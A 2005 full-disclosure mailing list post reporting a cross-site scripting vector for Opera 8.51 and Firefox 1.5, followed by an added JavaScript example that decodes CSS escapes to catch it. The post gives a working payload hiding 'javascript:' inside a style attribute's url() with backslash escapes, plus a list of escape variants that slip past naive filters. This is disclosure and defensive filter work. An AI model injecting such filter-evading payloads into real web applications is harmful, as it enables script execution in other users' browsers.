Date: Fri Dec  2 16:16:22 2005
From: st4rdust at gmail.com (hoshikuzu stardust)
Subject: Opera/8.51 Firefox/1.5 XSS attacking vector

Hello full-disclosure.

Sample:
<anytag
style="background:url(&quot;javascri\Dpt:/*/**/(function a()
{alert('JavaScript is executed.')})();&quot;);"
/>

Affected Web browsers are `Opera Version 8.51` and `Firefox/1.5`.
(Tested on Windows XP Service Pack 2.)

Variant:
"\d"
"\D"
"\0d"
"\00000d"
"\d "
"\00000d "
"\a"
"\9"
etc.
(Maybe we must check out \7 via IE on Mac (a.k.a. BELL on Mac);
I do not have a Mac.)

If your web application does not sanitize output, it is very easy to
inject malicious scripts.

Is it well-known information? Sorry.

BEST REGARDS.

--
hoshikuzu | star_dust
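
The following is an added example, not part of the original post: a filter-side check showing why a literal search for "javascript:" misses the escape variants listed above, and how decoding CSS escapes first catches them. The function names are hypothetical, and the input is assumed to be a style attribute value after HTML entity decoding.

```javascript
// Added example (not from the original post). Input is assumed to be a style
// attribute value after HTML entity decoding (&quot; already turned into ").

// Decode CSS backslash escapes: "\" + 1-6 hex digits + one optional whitespace,
// "\" + newline (line continuation, dropped), or "\" + any other character.
function decodeCssEscapes(css) {
  return css.replace(
    /\\([0-9a-fA-F]{1,6})(?:\r\n|[ \t\n\r\f])?|\\(?:\r\n|[\n\r\f])|\\([^\n\r\f])/g,
    (match, hex, literal) => {
      if (hex !== undefined) {
        const cp = parseInt(hex, 16);
        const invalid = cp === 0 || cp > 0x10ffff || (cp >= 0xd800 && cp <= 0xdfff);
        return invalid ? '\ufffd' : String.fromCodePoint(cp);
      }
      return literal !== undefined ? literal : '';
    }
  );
}

// Naive filter: looks for the literal scheme in the raw text.
function naiveHasScriptUrl(style) {
  return /javascript:/i.test(style);
}

// Normalizing filter: decode escapes, drop whitespace and control characters
// (CR, LF, TAB, BEL, ...), then look for the scheme.
function styleHasScriptUrl(style) {
  const normalized = decodeCssEscapes(style)
    .replace(/[\u0000-\u0020\u007f]/g, '')
    .toLowerCase();
  return normalized.includes('javascript:');
}

// Constructed samples built from the escape variants listed in the post.
const VARIANTS = ['\\d', '\\D', '\\0d', '\\00000d', '\\d ', '\\00000d ', '\\a', '\\9'];
function checkVariants() {
  return VARIANTS.map((v) => {
    const style = `background:url("javascri${v}pt:void(0)")`;
    return { variant: v, naive: naiveHasScriptUrl(style), normalized: styleHasScriptUrl(style) };
  });
}

console.table(checkVariants());
```

The check is deliberately conservative: any style value whose normalized form contains the scheme is flagged, including harmless text that merely mentions it.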
